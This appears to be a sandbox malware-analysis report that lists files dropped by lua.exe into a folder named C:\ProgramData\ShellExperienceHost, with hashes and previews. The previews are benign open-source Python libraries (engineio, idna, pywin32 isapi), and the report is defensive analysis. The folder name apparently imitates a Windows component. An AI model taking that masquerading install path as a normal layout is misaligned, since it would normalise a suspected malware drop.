Preview:	import six..from . import packet..from six.moves import urllib...class Payload(object):. """Engine.IO payload.""". max_decode_packets = 16.. def __init__(self, packets=None, encoded_payload=None):. self.packets = packets or []. if encoded_payload is not None:. self.decode(encoded_payload).. def encode(self, b64=False, jsonp_index=None):. """Encode the payload for transmission.""". encoded_payload = b''. for pkt in self.packets:. encoded_packet = pkt.encode(b64=b64). packet_len = len(encoded_packet). if b64:. encoded_payload += str(packet_len).encode('utf-8') + b':' + \. encoded_packet. else:. binary_len = b''. while packet_len != 0:. binary_len = six.int2byte(packet_len % 10) + binary_len. packet_len = int(packet_len / 10). if not pkt.binary:. encoded_

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\server.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	29420
Entropy (8bit):	4.257544623871468
Encrypted:	false
SSDEEP:	768:fx8P9dLKAdqN5o9jIjljHOLn3jzCljbADi:fx8P9dLQN5o9jIjljHODjzSjbA2
MD5:	1D1314E7EAD94D60780DADE02DBB45CC
SHA1:	6DB8BA4091A4BFD2FED34AA30E02330F9A178C86
SHA-256:	B2C9BBAE8B1793F2DDB5B65E101AA9A0025C98F2B18E58BE6D26DA3CCB1E0FA9
SHA-512:	E82EFD22D0B1E31FAB5EC9835118DB8D0CCE88DDE51D658390787209E317217ADCE4ECC6585A0015A05105DC33FB0CD51AC254B773AA48A46136F8287D1D5958
Malicious:	false
Preview:	import gzip.import importlib.import logging.import uuid.import zlib..import six.from six.moves import urllib..from . import exceptions.from . import packet.from . import payload.from . import socket..default_logger = logging.getLogger('engineio.server')...class Server(object):. """An Engine.IO server... This class implements a fully compliant Engine.IO web server with support. for websocket and long-polling transports... :param async_mode: The asynchronous model to use. See the Deployment. section in the documentation for a description of the. available options. Valid async modes are "threading",. "eventlet", "gevent" and "gevent_uwsgi". If this. argument is not given, "eventlet" is tried first, then. "gevent_uwsgi", then "gevent", and finally "threading".. The first async mode that has all its dependencies. installed is t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\socket.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9933
Entropy (8bit):	4.1651908018609785
Encrypted:	false
SSDEEP:	96:TGsQ0gSK4ewsJJ2HFZfSIhsHiOTW74wziM9TK1J7Ue9h0w7miXe1D6KbdvMAUHmx:TpL02j8DTo/zd1Kcermn1D6KKANWm
MD5:	994B86C1729885B5912726729AB9302B
SHA1:	829C14705BBC86CFD54D8040096CAE8D21B12160
SHA-256:	45153A9DDB3CA85F5C3BA07161A77F58A198541317965CAA1B3D4882C1E5700D
SHA-512:	FEEB300EC2CCE3AEB61B012E20832EAE9E4E97AB7F9A731B70A0F36995DD8027A5B4D76013A10C70689CFB0F10DE9FE8F526C685A4ED7827924D37E194CE77D2
Malicious:	false
Preview:	import six.import sys.import time..from . import exceptions.from . import packet.from . import payload...class Socket(object):. """An Engine.IO socket.""". upgrade_protocols = ['websocket'].. def __init__(self, server, sid):. self.server = server. self.sid = sid. self.queue = self.server.create_queue(). self.last_ping = time.time(). self.connected = False. self.upgrading = False. self.upgraded = False. self.closing = False. self.closed = False. self.session = {}.. def poll(self):. """Wait for packets to send to the client.""". queue_empty = self.server.get_queue_empty_exception(). try:. packets = [self.queue.get(timeout=self.server.ping_timeout)]. self.queue.task_done(). except queue_empty:. raise exceptions.QueueEmpty(). if packets == [None]:. return []. while True:. try:. pkt = self.queue.get(

C:\ProgramData\ShellExperienceHost\Lib\site-packages\engineio\static_files.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1851
Entropy (8bit):	4.138303328470251
Encrypted:	false
SSDEEP:	48:oGkNjTgb7XjGtiHzDkZeNRkuoZGf0VXACWVy:oOXjG4T0ZJVXnyy
MD5:	03F1EF90F02BE69A1143ED449DFEB333
SHA1:	4808FD580055FECE22A2752B8CC5765B1E7A5B83
SHA-256:	2C3860261B23271B0C49D3846499AEFECABBB7D81E624E228F95BF5F0449A400
SHA-512:	C4F15F6FD30C9AFD6DED5D93EC1690EE7DCA7634B5F782AA750EB0DD977B68839E22DC3A5441CB8CAD45E6D8CE1E7AB7A40172811187EE4B2A5264DFE353AB08
Malicious:	false
Preview:	content_types = {. 'css': 'text/css',. 'gif': 'image/gif',. 'html': 'text/html',. 'jpg': 'image/jpeg',. 'js': 'application/javascript',. 'json': 'application/json',. 'png': 'image/png',. 'txt': 'text/plain',.}...def get_static_file(path, static_files):. """Return the local filename and content type for the requested static. file URL... :param path: the path portion of the requested URL.. :param static_files: a static file configuration dictionary... This function returns a dictionary with two keys, "filename" and. "content_type". If the requested URL does not match any static file, the. return value is None.. """. if path in static_files:. f = static_files[path]. else:. f = None. rest = ''. while path != '':. path, last = path.rsplit('/', 1). rest = '/' + last + rest. if path in static_files:. f = static_files[path] + rest. break. e

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna-2.10.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna-2.10.dist-info\LICENSE.rst Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1565
Entropy (8bit):	5.106624399698215
Encrypted:	false
SSDEEP:	48:ZMOorYJYirYJd9dad432sGa3tErmf3toTRv:ZVorYJYirYJd6K313t7uTJ
MD5:	CF36C8682CC154D2D4AA57BD6246B9A1
SHA1:	213659E517DCB5A6963A0B7869CB1BE625FCA442
SHA-256:	412014420D2473DBA06117C3D4D9E0EECAA6DDE0CA30CD951F4EC2BE39426F32
SHA-512:	180DFF753D79BDC31A88275CCA4E2941AB58409CBE2E27B59ECAB85A72263A1E1C077B79360D5A85316B138798783CF3AEA500C3F045BF034EA1D5E4BB87FC27
Malicious:	false
Preview:	License.-------..License: bsd-3-clause..Copyright (c) 2013-2020, Kim Davies. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..#. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...#. Redistributions in binary form must reproduce the above. copyright notice, this list of conditions and the following. disclaimer in the documentation and/or other materials provided with. the distribution...#. Neither the name of the copyright holder nor the names of the . contributors may be used to endorse or promote products derived . from this software without specific prior written permission...#. THIS SOFTWARE IS PROVIDED BY THE CONTRIBUTORS "AS IS" AND ANY. EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE. IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR. PU

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna-2.10.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9104
Entropy (8bit):	5.217430851150806
Encrypted:	false
SSDEEP:	192:AzX0ZCbsauJGCX3KQgYiVIXqCcFA7GDK0sk3Z16gMwIr7:A7nsa0G83XiVIbcC7GDps+16gMj3
MD5:	51DA414B478154A813A45661F368B771
SHA1:	BE0C42B22C62C6BA6F8DCA6BCDF591767224F979
SHA-256:	65609A4030637664AFC79114EC2BFA3910BEF4D510EA75E1D5E5F1DFCC927B8D
SHA-512:	6F966C5E483D2A362D8D357926D26700E6229735DE041F54F2FFE9A09BB6993FF824159EE7FEDAC335A4EDCFC90EF3212A3A82735702CE556B301585E9CBFBC5
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: idna.Version: 2.10.Summary: Internationalized Domain Names in Applications (IDNA).Home-page: https://github.com/kjd/idna.Author: Kim Davies.Author-email: kim@cynosure.com.au.License: BSD-like.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Intended Audience :: System Administrators.Classifier: License :: OSI Approved :: BSD License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.4.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: Implementation :: CPytho

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna-2.10.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.799913926559083
Encrypted:	false
SSDEEP:	24:pn/2zDIvRw0YV+L18flW6MQ/wZdlIqAMySAxRyBrSJU+vTM8rpo8/mlXi:pnuXI5wxV+pilWZQYI+cUK4kpX/V
MD5:	93E3010E4D5BEB73F61DE2CE48EE2DB9
SHA1:	159C6178DB2E5803913D6D5702A15885FB618B86
SHA-256:	3D2EBC6596664BACAFC20F294D701FB501EABAC2548E630A422EF9B4518896D4
SHA-512:	FFE2D9A4407F52C1FD278601D59EBDACBBAC348F00963644F7ADD5D03B7C34D4059BF74E4C489476C6218AC1C6C17EE3C9E479E3CD5665BA73E9E474486C4356
Malicious:	false
Preview:	idna-2.10.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..idna-2.10.dist-info/LICENSE.rst,sha256=QSAUQg0kc9ugYRfD1Nng7sqm3eDKMM2VH07CvjlCbzI,1565..idna-2.10.dist-info/METADATA,sha256=ZWCaQDBjdmSvx5EU7Cv6ORC-9NUQ6nXh1eXx38ySe40,9104..idna-2.10.dist-info/RECORD,,..idna-2.10.dist-info/WHEEL,sha256=8zNYZbwQSXoB9IfXOjPfeNwvAsALAjffgk27FqvCWbo,110..idna-2.10.dist-info/top_level.txt,sha256=jSag9sEDqvSPftxOQy-ABfGV_RSy7oFh4zZJpODV8k0,5..idna/__init__.py,sha256=9Nt7xpyet3DmOrPUGooDdAwmHZZu1qUAy2EaJ93kGiQ,58..idna/__pycache__/__init__.cpython-37.pyc,,..idna/__pycache__/codec.cpython-37.pyc,,..idna/__pycache__/compat.cpython-37.pyc,,..idna/__pycache__/core.cpython-37.pyc,,..idna/__pycache__/idnadata.cpython-37.pyc,,..idna/__pycache__/intranges.cpython-37.pyc,,..idna/__pycache__/package_data.cpython-37.pyc,,..idna/__pycache__/uts46data.cpython-37.pyc,,..idna/codec.py,sha256=lvYb7yu7PhAqFaAIAdWcwgaWI2UmgseUua-1c0AsG0A,3299..idna/compat.py,sha256=R-h29D-6mrnJzbXxymrWUW7iZUv

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna-2.10.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.810105929829005
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVin3hP+tPCCf7irO5S:RtBMwlVi3hWBBwt
MD5:	E810E49A07579615336DFE1362445C07
SHA1:	7C415D7E52F9507D6414824277CFAE91AB5006E7
SHA-256:	F3335865BC10497A01F487D73A33DF78DC2F02C00B0237DF824DBB16ABC259BA
SHA-512:	3422782BB6F30F4CFFC8BA0648F4A18B2A942A602D7F2676C04402B1549B34E50C1F5F5CD12FC495D08A9C0DB82FB78503CA075BC2479F9519960A0F044B1F09
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.33.6).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna-2.10.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Aa:Aa
MD5:	1929D9F7C81F25C32830EBFE29FEC2B2
SHA1:	CF120440E59032DA490AA8FDC118B6F764FE495D
SHA-256:	8D26A0F6C103AAF48F7EDC4E432F8005F195FD14B2EE8161E33649A4E0D5F24D
SHA-512:	A3833D513EE4DDDEE80692BBA4D389B4E9E39029F7156DE4D58207899C7F625CCAFE67C8B4690895D3B16AACCA6C00AEEBB63A04C7DFF408FA5F71BF3B404685
Malicious:	false
Preview:	idna.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	58
Entropy (8bit):	4.113868658988408
Encrypted:	false
SSDEEP:	3:1LVXMi72MDXTxGzbQln:1LVX17/TxcQln
MD5:	8ACFF87EAD0244330C22125C16FCAADB
SHA1:	12DC726D536AC216BA05BB7EB8A014A5609A0DA0
SHA-256:	F4DB7BC69C9EB770E63AB3D41A8A03740C261D966ED6A500CB611A27DDE41A24
SHA-512:	A55B5EB3035D230CB7CC89BD0B7EFFAD84EB48C360EEFBB20993347B28CF3B1D75480D65A937392820AAB4081B0DB07C69B47A893CBEEF52C031F417E706939C
Malicious:	false
Preview:	from .package_data import __version__.from .core import *.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\codec.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3299
Entropy (8bit):	4.242897540845655
Encrypted:	false
SSDEEP:	96:zBc80c8yYUVJXGzCfiGf4WZlHGzvfiOUycj4:zBEiYUvu5k3RuCdycj4
MD5:	A36C9A662F4DD0E6D8D4A48DBE68ADE5
SHA1:	A781C8B744B9FC5EAB020EDC44F3C93556F972A3
SHA-256:	96F61BEF2BBB3E102A15A00801D59CC2069623652682C794B9AFB573402C1B40
SHA-512:	21FB37491028C79683F2B04FD09FB7AB8E1FD169E548BE53120B010B4B33F0421978C909D0CDCF4F13E641027BF7248A510763C67566A1F0A61E94AB70316A0E
Malicious:	false
Preview:	from .core import encode, decode, alabel, ulabel, IDNAError.import codecs.import re.._unicode_dots_re = re.compile(u'[\u002e\u3002\uff0e\uff61]')..class Codec(codecs.Codec):.. def encode(self, data, errors='strict'):.. if errors != 'strict':. raise IDNAError("Unsupported error handling \"{0}\"".format(errors)).. if not data:. return "", 0.. return encode(data), len(data).. def decode(self, data, errors='strict'):.. if errors != 'strict':. raise IDNAError("Unsupported error handling \"{0}\"".format(errors)).. if not data:. return u"", 0.. return decode(data), len(data)..class IncrementalEncoder(codecs.BufferedIncrementalEncoder):. def _buffer_encode(self, data, errors, final):. if errors != 'strict':. raise IDNAError("Unsupported error handling \"{0}\"".format(errors)).. if not data:. return ("", 0).. labels = _unicode_dots_re.split(data). trai

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	232
Entropy (8bit):	4.546556797963972
Encrypted:	false
SSDEEP:	6:1LcQlBKl8bN0tyrZ9v+jLqBvtyA0v+92QyneAJFHkwIDA:1hKGFo1M2fnbHIDA
MD5:	2F0D04609DA1142C3A3F74C336EA5744
SHA1:	200367634C3CE53792BD6C0F4D7D50E6C3C842E2
SHA-256:	47E876F43FBA9AB9C9CDB5F1CA6AD6516EE2654BF2FB6E934306748A3E7B8B85
SHA-512:	3A17968829937792BFEE95F698D5779445CC56FF7541A9851065CDD5F773E4E9B7ABE02309D34B9733FE8DC33E76A582A286988DD3A153D89162BC896CD10160
Malicious:	false
Preview:	from .core import .from .codec import ..def ToASCII(label):. return encode(label)..def ToUnicode(label):. return decode(label)..def nameprep(s):. raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol")..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\core.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11951
Entropy (8bit):	4.538231004550522
Encrypted:	false
SSDEEP:	192:wsSrsaiQc+soprOZsphBtjYVMLAayFr0266Xy5BPsN/Cxya8xtTT:w//bmMLAayFr026M1Nl
MD5:	4C71B8F90036F3A177EE082611E43867
SHA1:	450CE1849FDABF71EAB61455E7A671AA57FA3C66
SHA-256:	8C2A1A2DBDDB036B52FC30F1F4FA46B8D4C46593768C0CC1DFAF5A3FE2076111
SHA-512:	48B1CB5CEE130357141D52BECB3B887661AEB7458EF5E3F9DDC51D0756C5057A34D056D32CE81500073B21001FB0AFB2EDE72DF243955C8E9B1118AF5779CC83
Malicious:	false
Preview:	from . import idnadata.import bisect.import unicodedata.import re.import sys.from .intranges import intranges_contain.._virama_combining_class = 9._alabel_prefix = b'xn--'._unicode_dots_re = re.compile(u'[\u002e\u3002\uff0e\uff61]')..if sys.version_info[0] >= 3:. unicode = str. unichr = chr..class IDNAError(UnicodeError):. """ Base exception for all IDNA-encoding related problems """. pass...class IDNABidiError(IDNAError):. """ Exception when bidirectional requirements are not satisfied """. pass...class InvalidCodepoint(IDNAError):. """ Exception when a disallowed or unallocated codepoint is used """. pass...class InvalidCodepointContext(IDNAError):. """ Exception when the codepoint is not valid in the context it is used """. pass...def _combining_class(cp):. v = unicodedata.combining(unichr(cp)). if v == 0:. if not unicodedata.name(unichr(cp)):. raise ValueError("Unknown character in unicodedata"). return v..def _is_script(cp,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\idnadata.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	42350
Entropy (8bit):	3.4447742689652694
Encrypted:	false
SSDEEP:	768:WSG0YeKOB/AUeBCe9hLl24vLMSoBwv6YIc7:WTOSBCa24L0K
MD5:	1E1B60E5123A4D9BA471DD3F4BEDC4D7
SHA1:	8564A5B66F4CCF419B9390CD0C6A95DEED5FBE05
SHA-256:	826CC5C195A3766B3790A67F33FBF0CFBF8B3FF4828187D2784D37076D50A6C9
SHA-512:	375481E94FBD3176EE8A44683EF1F27812173AA75DEC97D69638577B6727D4413DDA0E85CDD28C7D38DA7A22386A9FBBE2C67227D7410E5243E8281F731C6894
Malicious:	false
Preview:	# This file is automatically generated by tools/idna-data..__version__ = "13.0.0".scripts = {. 'Greek': (. 0x37000000374,. 0x37500000378,. 0x37a0000037e,. 0x37f00000380,. 0x38400000385,. 0x38600000387,. 0x3880000038b,. 0x38c0000038d,. 0x38e000003a2,. 0x3a3000003e2,. 0x3f000000400,. 0x1d2600001d2b,. 0x1d5d00001d62,. 0x1d6600001d6b,. 0x1dbf00001dc0,. 0x1f0000001f16,. 0x1f1800001f1e,. 0x1f2000001f46,. 0x1f4800001f4e,. 0x1f5000001f58,. 0x1f5900001f5a,. 0x1f5b00001f5c,. 0x1f5d00001f5e,. 0x1f5f00001f7e,. 0x1f8000001fb5,. 0x1fb600001fc5,. 0x1fc600001fd4,. 0x1fd600001fdc,. 0x1fdd00001ff0,. 0x1ff200001ff5,. 0x1ff600001fff,. 0x212600002127,. 0xab650000ab66,. 0x101400001018f,. 0x101a0000101a1,. 0x1d2000001d246,. ),. 'Han': (. 0x2e800

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\intranges.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1749
Entropy (8bit):	4.485549268238478
Encrypted:	false
SSDEEP:	48:wic7vy/ORhzgnc9SbrMvypoHvJgCbHmSXikyXP:pcvYcUk0oHRgCbHmOPy/
MD5:	5D37B041D01AEFD92CCAC0BFF286A7C9
SHA1:	8F1C8EDAD0338F65DACE85A9B68EA469C858427B
SHA-256:	4D8D65A7164841610FEAD36A8D9905039860A0C58E8F53819A7506F22853F3B1
SHA-512:	9B846B609E1843A14F35FE00012FC8FA6557EEBFBD9E04B3B3844CFDEB29CDC5FFE367A57E3890B36DD8BE8E9D8B8136318AC99A6BD8892665721857CAC66BA8
Malicious:	false
Preview:	""".Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).."""..import bisect..def intranges_from_list(list_):. """Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 \| end), not as tuples.. """.. sorted_list = sorted(list_). ranges = []. last_write = -1. for i in range(len(sorted_list)):. if i+1 < len(sorted_list):. if sorted_list[i] == sorted_list[i+1]-1:. continue. current_range = sorted_list[last_write+1:i+1]. ranges.append(_encode_range(current_range[0], current_range[-1] + 1)). last_write = i.. return

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\package_data.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.8230679822736597
Encrypted:	false
SSDEEP:	3:cvaQOn:8aQO
MD5:	1A56C43E488B6AA863596FB0086B01B7
SHA1:	AB8451205DA5621D19BB54C983BD12BB23802A24
SHA-256:	6F1063A4B9C4D3AFF58D260A132E6CBCE32ED7333738CCED5D551BD6D3E5729D
SHA-512:	62094688F71E4092D7BA090B4ADA1364C5263619050861AFD29ADB1074B7D9E838DAF7EFE93A4D6FB328B2F90C977CF338E9EC25A9197E87D9B3A5F86F4E7B3B
Malicious:	false
Preview:	__version__ = '2.10'..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\idna\uts46data.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	202084
Entropy (8bit):	4.473429434416405
Encrypted:	false
SSDEEP:	3072:0K3n8iZKA6RxVW5saEIK801+xXRoROX09t:QLxepEb801UXRoAX0/
MD5:	783E04A79BB43145731B33A3372F4E05
SHA1:	823194E21B8ED155CE661CDA98A012535AF36A97
SHA-256:	94C770DB3763907D495165CF3C47C5512613DC5CA3EB46C199F2EFBF2E66EE4A
SHA-512:	5F8D73C93047FFCA7BEB45FC51DD87D5ADFE38CB309CA15FB25CF1AC5CC63C1D6F5379190F270DCE3E0294D01E7079FDC2AC02FF2A432615C139F46206D28A4B
Malicious:	false
Preview:	# This file is automatically generated by tools/idna-data.# vim: set fileencoding=utf-8 :.."""IDNA Mapping Table from UTS46."""...__version__ = "13.0.0".def _seg_0():. return [. (0x0, '3'),. (0x1, '3'),. (0x2, '3'),. (0x3, '3'),. (0x4, '3'),. (0x5, '3'),. (0x6, '3'),. (0x7, '3'),. (0x8, '3'),. (0x9, '3'),. (0xA, '3'),. (0xB, '3'),. (0xC, '3'),. (0xD, '3'),. (0xE, '3'),. (0xF, '3'),. (0x10, '3'),. (0x11, '3'),. (0x12, '3'),. (0x13, '3'),. (0x14, '3'),. (0x15, '3'),. (0x16, '3'),. (0x17, '3'),. (0x18, '3'),. (0x19, '3'),. (0x1A, '3'),. (0x1B, '3'),. (0x1C, '3'),. (0x1D, '3'),. (0x1E, '3'),. (0x1F, '3'),. (0x20, '3'),. (0x21, '3'),. (0x22, '3'),. (0x23, '3'),. (0x24, '3'),. (0x25, '3'),. (0x26, '3'),. (0x27, '3'),. (0x28, '3'),. (0x29, '3'),. (0x2A, '3'),. (0x2B, '3'),. (0x2C, '3'),. (0x2D, 'V'),. (0x2E, 'V'),. (0x2F, '3'),. (0x30, 'V'),.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\PyISAPI_loader.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	6.179697726720696
Encrypted:	false
SSDEEP:	1536:5CHaKZo7aggSU7bnYMkikAPK523zVn14:Q6u+aggSU7bzk0K523zVn1
MD5:	6C56000FF5E4342C4D904D90720F5B6A
SHA1:	7CF02EFD6911FDE56DB9DED8E872DC044225B559
SHA-256:	9868A32FF774E1B3733F02AAEFA813ABF253B2BBB3CB8D25EBF54C484A69D97B
SHA-512:	B31D5867091B2D6980119C1A511E0708CEB4F9EC37D72C37BDBF713DC17D312AB472F393D296DEB94B9B0164190310A608649B8368AC61C6A23EACB8E0D91C24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<e.x...x...x...q\|..r...CZ..z....K.y...CZ..z...CZ..h...CZ..s..._..z....f..}...x........Z..~....Z..y....Zs.y....Z..y...Richx...........PE..L....\._...........!.....n...V.......p............8.......................................@........................................................................ ...T...........................x...@............................................text....m.......n.................. ..`.rdata...3.......4...r..............@..@.data...............................@....gfids..L...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\README.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	323
Entropy (8bit):	4.863721501858572
Encrypted:	false
SSDEEP:	6:MWNQ9OXffZSu395fJzKhFdUTmL+1TT+KjDhVJeAFiS0JWnB:MWy9OX/N9Z3T1TT+KRneAprnB
MD5:	7F3958AD30B12EC2130CBC7334AB2359
SHA1:	A6CF6266815D7C5FCD1449090F9CF3024F430107
SHA-256:	D08B643F4D500E174BA1BB17D9AB2485930957CC0168F14C8D05666FB8C3F550
SHA-512:	EBB95B6DFB9FFDD26CAF68F8C000BF8268B8BC7B843944303DAF7A85EC1936ECB17584FC846068E464826A5A4B123A623D8B67075A96FE224AE7BF26B500A7D0
Malicious:	false
Preview:	A Python ISAPI extension. Contributed by Phillip Frantz, and is.Copyright 2002-2003 by Blackdog Software Pty Ltd...See the 'samples' directory, and particularly samples\README.txt..You can find documentation in the PyWin32.chm file that comes with pywin32 - .you can open this from Pythonwin->Help, or from the start menu.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1240
Entropy (8bit):	4.463104277211742
Encrypted:	false
SSDEEP:	24:RlwjxtACqdad/YACPPNiwoKtTWZNc5b8WqAuvKMJbK:R6jxtjzCjPw4TOQb8XAnkbK
MD5:	ACF9725E16F897ECBD05857447B6C317
SHA1:	4B24BA520777CB0077C713CB7D508DFEA8B6723B
SHA-256:	BEC16D273C30E27C77B30A0F5C28D0656028E956C5C4A3FB44A58F1C89F52820
SHA-512:	FE10BBB951EF1EF4A4B65F1368B4EDD1702D8506FD71B04FC2773E725A279108D1E93F323C0514B8F7DC411A9636A0F4B67CA1D86CF895200846BA769FD08163
Malicious:	false
Preview:	# The Python ISAPI package...# Exceptions thrown by the DLL framework..class ISAPIError(Exception):. def __init__(self, errno, strerror = None, funcname = None):. # named attributes match IOError etc.. self.errno = errno. self.strerror = strerror. self.funcname = funcname. Exception.__init__(self, errno, strerror, funcname). def __str__(self):. if self.strerror is None:. try:. import win32api. self.strerror = win32api.FormatMessage(self.errno).strip(). except:. self.strerror = "no error message is available". # str() looks like a win32api error.. return str( (self.errno, self.strerror, self.funcname) ). .class FilterError(ISAPIError):. pass. .class ExtensionError(ISAPIError):. pass..# A little development aid - a filter or extension callback function can.# raise one of these exceptions, and the handler module will be reloaded..# This means you

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\doc\isapi.html Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4160
Entropy (8bit):	4.872533696011899
Encrypted:	false
SSDEEP:	96:6AJQczz0jdpALt4DVI6HVt6Lu90PYC7drlFDeiI97qqUFXB6wpe3f04p:6hLVt6NQCxiihXMwcv04p
MD5:	F7697BC2AEAE59A9BEDFABD3192E80FF
SHA1:	BB4B1E7F5F7626F2F3DC2490931355658A6212D9
SHA-256:	0B67CC1EF06CCFD881C29DA61C775C52B634C7BCA1EAB5B19AC2A1685B0164EE
SHA-512:	06C654ED9EEE02BE94ED3FE7BB10E22A878EFCDE089916DECE2B4A305A27E7CC26FD743C31F43038AE87AB7AD1F93848E5499DF4AEC85254651833384AE585A1
Malicious:	false
Preview:	NOTE: This HTML is displayed inside the CHM file - hence some hrefs. will only work in that environment.-->.<HTML>.<BODY>.<TITLE>Introduction to Python ISAPI support</TITLE>..<h2>Introduction to Python ISAPI support</h2>..<h3>See also</h3>.<ul>. <li><a href="/isapi_modules.html">The isapi related modules</a>. </li>. <li><a href="/isapi_objects.html">The isapi related objects</a>. </li>.</ul>.<p><i>Note: if you are viewing this documentation directly from disk, .most links in this document will fail - you can also find this document in the.CHM file that comes with pywin32, where the links will work</i>..<h3>Introduction</h3>.This documents Python support for hosting ISAPI exensions and filters inside.Microsoft Internet Information Server (IIS). It assumes a basic understanding .of the ISAPI filter and extension mechanism..<p>.In summary, to implement a filter or extension, you provide a Python module.which defines a Filter and/or Extension class. Once your class ha

C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\install.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27608
Entropy (8bit):	4.786186280763216
Encrypted:	false
SSDEEP:	384:hitQo34uXFRRjkpsYNWN3x47DcYZgjMIvc41tRNMnkZ3HT0m3XhK57Vk9ujazmgl:hitQk4uENZgntRVnhK57N78
MD5:	CB914FC76D6C596E57AD4088FDD9799C
SHA1:	05EDFA989B79BDA709343172A876D6588E5B4C85
